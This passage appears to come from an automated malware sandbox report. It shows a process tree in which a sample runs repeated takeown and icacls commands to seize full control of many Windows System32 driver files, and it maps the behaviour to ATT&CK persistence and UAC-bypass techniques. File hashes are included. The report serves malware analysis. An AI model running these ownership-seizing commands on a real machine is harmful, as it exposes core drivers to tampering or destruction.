C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vmstorfl.sys && icacls C:\Windows\System32\drivers\vmstorfl.sys /grant "%username%:F" && exit2⤵PID:1960
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\vmstorfl.sys3⤵
- Modifies file permissions
PID:7604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\volmgr.sys && icacls C:\Windows\System32\drivers\volmgr.sys /grant "%username%:F" && exit2⤵PID:4872
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\volmgr.sys3⤵PID:7648
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\volmgrx.sys && icacls C:\Windows\System32\drivers\volmgrx.sys /grant "%username%:F" && exit2⤵PID:5304
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\volsnap.sys && icacls C:\Windows\System32\drivers\volsnap.sys /grant "%username%:F" && exit2⤵PID:3468
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vsmraid.sys && icacls C:\Windows\System32\drivers\vsmraid.sys /grant "%username%:F" && exit2⤵PID:1632
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\vsmraid.sys3⤵PID:7672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vwifibus.sys && icacls C:\Windows\System32\drivers\vwifibus.sys /grant "%username%:F" && exit2⤵PID:2544
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\vwifibus.sys3⤵PID:7700
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vwififlt.sys && icacls C:\Windows\System32\drivers\vwififlt.sys /grant "%username%:F" && exit2⤵PID:3652
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vwifimp.sys && icacls C:\Windows\System32\drivers\vwifimp.sys /grant "%username%:F" && exit2⤵PID:5668
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\wacompen.sys && icacls C:\Windows\System32\drivers\wacompen.sys /grant "%username%:F" && exit2⤵PID:5804
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\wanarp.sys && icacls C:\Windows\System32\drivers\wanarp.sys /grant "%username%:F" && exit2⤵PID:6052
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\watchdog.sys && icacls C:\Windows\System32\drivers\watchdog.sys /grant "%username%:F" && exit2⤵PID:3420
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\wd.sys && icacls C:\Windows\System32\drivers\wd.sys /grant "%username%:F" && exit2⤵PID:3184
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Wdf01000.sys && icacls C:\Windows\System32\drivers\Wdf01000.sys /grant "%username%:F" && exit2⤵PID:5176
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\WdfLdr.sys && icacls C:\Windows\System32\drivers\WdfLdr.sys /grant "%username%:F" && exit2⤵PID:3784
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\wfplwf.sys && icacls C:\Windows\System32\drivers\wfplwf.sys /grant "%username%:F" && exit2⤵PID:6156
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\wimmount.sys && icacls C:\Windows\System32\drivers\wimmount.sys /grant "%username%:F" && exit2⤵PID:6200
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\winhv.sys && icacls C:\Windows\System32\drivers\winhv.sys /grant "%username%:F" && exit2⤵PID:6260
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\wmiacpi.sys && icacls C:\Windows\System32\drivers\wmiacpi.sys /grant "%username%:F" && exit2⤵PID:6332
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\wmilib.sys && icacls C:\Windows\System32\drivers\wmilib.sys /grant "%username%:F" && exit2⤵PID:6360
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ws2ifsl.sys && icacls C:\Windows\System32\drivers\ws2ifsl.sys /grant "%username%:F" && exit2⤵PID:6416
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\WUDFPf.sys && icacls C:\Windows\System32\drivers\WUDFPf.sys /grant "%username%:F" && exit2⤵PID:6468
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\WUDFRd.sys && icacls C:\Windows\System32\drivers\WUDFRd.sys /grant "%username%:F" && exit2⤵PID:6480
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-12504852535114282982559108991727715739501317440525675229-512061581-686635493"1⤵PID:1740
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-413874045-11205033174233756913974439002145862461-11313556811969025703-107782407"1⤵PID:568
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1425611529-597050752-11863401812010040003-1999493921706548879146895945-1757242746"1⤵PID:1212
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-19673350042070290055-200727377521414371661653536340266071442467376-332249039"1⤵PID:268
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1158633364-1001587524-1195740942-618008001-8826698-1799261124-4274674671808113922"1⤵PID:2516
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "502982392121620223252184176-1384763121-161227806318784303421358830507-676740508"1⤵PID:2844
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "741230558-4695387695698526841805383027-11432787719551824611267162502-617936257"1⤵PID:2800
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1497279770287531814189140657-83114107925451080-589023849-1402247151593692994"1⤵PID:2912
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "3764463191179504980489106542-15783623301604960059-15772749571377431585-286576122"1⤵PID:616
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-753909943-2030158418-632010319-182534274980402869-276564376604421453-1968931444"1⤵PID:1908
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "212542570716153239121576351316-1689600936-1131102566-35518679920433601191261898536"1⤵PID:788
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "79418552390177984319626546632057244406-3545828742045503014-689524953733571435"1⤵PID:1416
-
C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R1⤵PID:2644
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1411250918420427785-2092731971-161889829219483501061039808132-1916075078232503373"1⤵PID:2596
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "835822030-320291065-1646255318-3057798571234873878192798962-1341315016-1705370124"1⤵PID:2804
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1308095610-66802665904987281-123745565615742361131655378041285866235-1762998124"1⤵PID:1900
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-268903752-667040418-1944216651665134954-317248482108309317-851836137131414631"1⤵PID:836
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "133597895814909924511077556018-98061709-10335264821762255085-1616247858-1566893529"1⤵PID:928
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-433357134-1261213469626251291-1861879467-1885387813-1482841218-5902396321678530628"1⤵PID:2980
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "4959298908914054131892468559-17550163381868486381276974408746798901-74758636"1⤵PID:2676
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-11202808461216890756-825912912135417222-1003382785-4140381699703901691745804823"1⤵PID:384
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "2917411672125394699-1713865514-8893865214036431191638875271-1390440106-1363375413"1⤵PID:1740
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "463133115-186052617-189845054325910245577094098-13969326444556362211024668850"1⤵PID:328
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-265104017-5039031811026844655-194496057-57481615016376092166432223952124787613"1⤵PID:2648
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1325169454365553543642595993-18046958971420984222-3748840911315221346315015279"1⤵PID:1580
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-6751285271805827354-12128499592755018091636317481992532691-9582286951625928070"1⤵PID:764
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "6750239431334577479-30133459-975352335152697075120898178291507630248-1339782663"1⤵PID:2860
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-111872130-1096875014-18976979211235533389-1473568282-14032312061165901692-519261380"1⤵PID:1852
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-16310207371698784813-556748656-177274652-863414095-5697571051355636133267555857"1⤵PID:2832
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-228930568415875382-469097775-13204578937337308555432858-1739298398-1312686919"1⤵PID:2152
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "139251431139561971149827646851663780-104767654-2010398436-1451188499-2110241970"1⤵PID:1364
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1964671506-826709585113832228-558012985-10494957401779564839-4082070031020471600"1⤵PID:2136
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1950996074304024936-2030084824932911153547815766-631382790-842530597-607673427"1⤵PID:2712
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-663484289-1058409012-12213830791409565093-1489062299-1227152810110934891700907412"1⤵PID:1232
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-864149638-113124850235858471914798110881318383346-751628942569560735-1430590452"1⤵PID:996
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "876563149100709584117115900213396040001298529895-104567988318000127-647009493"1⤵PID:2640
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "196883128815022483901459963263352203392-152037514-9468151711494356322-161658484"1⤵PID:2616
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1345671342-1720084539-9145624651902073970-715355928-1941201672-2051206344-1828932604"1⤵PID:1188
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "3952645391590667283269263678-192306828-10939792506792929501410619203-1112749758"1⤵PID:796
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "460631247-18683061201422154931-17929318731309440712-1823704939-7156550241234382687"1⤵PID:1532
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-931001163122769391414075619019709455804301068171137016886430177483-1315167266"1⤵PID:1744
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "12081410191989440601782500996-18769815121253071025-163680044220296052961218128169"1⤵PID:2972
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1928811205-631159405760367649133291684-1781579079-2015408651-8776972362059567487"1⤵PID:2692
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-2090989477-324953875-32789296-2136835204613416340-17531814591782874163666966846"1⤵PID:2592
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1882110797892897026-7842282991728785196-11842535811123142171354302264-1560893075"1⤵PID:1856
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "929768323838378531791558569-408514172015811718-79944318-730215324652082793"1⤵PID:2436
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "549811235-24437450615291349231185227768130011207-523277825-339339408-243035314"1⤵PID:1212
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "32024048174446641-1492387179117354351-1006274442-1582010810-1839596502-367878756"1⤵PID:1704
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "446271551-45844174921305734981875553411-13614847211552147854-666033463263347157"1⤵PID:1524
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-9565434659983128959594543471540784178-1198722942-1140547291-2064106278-55119259"1⤵PID:1516
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-2048806332-800174446-1575114282958732208-20696075441750419494-19345823911740881043"1⤵PID:2496
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1625943530-311444049-1433525773421101249213067885010125644474601661452129188628"1⤵PID:3108
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1593228500-2025865303811922551939535445-1127701181-76513044719029625761052542302"1⤵PID:3200
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1875845465-952551588789770902-2033485266-1825068225-1567491970550438758-848280568"1⤵PID:2672
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1660366461-963053543-627624440-16537849389863487518181899743695080251908081839"1⤵PID:272
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1043088804-663743059-157663413-1136165633-328240149285210460-369836124-1572935184"1⤵PID:820
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-778968596-1830146963-866985756930277884-19877981211664406877814436235-1760638639"1⤵PID:3948
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "2012864824-1364131708-18217543845966753911635546765-1262253055-19537633531737955333"1⤵PID:4016
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "5860678397351190402112503120176960837102515564580893799313197287041385958213"1⤵PID:2576
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1107080383-11027059041262705238-13680740411075164671481519930-128682167-361737975"1⤵PID:1608
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Winlogon Helper DLL
2Event Triggered Execution
1Change Default File Association
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
2Winlogon Helper DLL
2Event Triggered Execution
1Change Default File Association
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\Desktop\▀5½õ♠≈²—߬▌3∞ř²č☼ž☼♦¥Ÿ╚◄╠µÿ®®☼↑æ▼▲1█♪¢₧╬ř╔○◘☻3½╥╚ř94ß霚♣5╔ä¥řčåé¶é«õ¶○ó╬½▐ÿ╔♣≈▌čσ╔1■≈♫²¥♥«7ä6ø™▬1π♂
Filesize666B
MD59e1e5883c74742a497cf5c272ccd2321
SHA12cf33e34d08b8e17743a60352baffef4b6f02dee
SHA256ca687b6a7c3d29b566f3e1988b9f877b51d9a83ee25ffe0755a8dcd3eb5f434a
SHA512f2284f0c624cc07a65c16f87865bb98aaa176b1d8b45cd4fbcc1143c9c2297fe6b1d4db55ef054be2bc151c8cc25ff4da7c997b7d38dae3dccd2ffe1c3c01a6b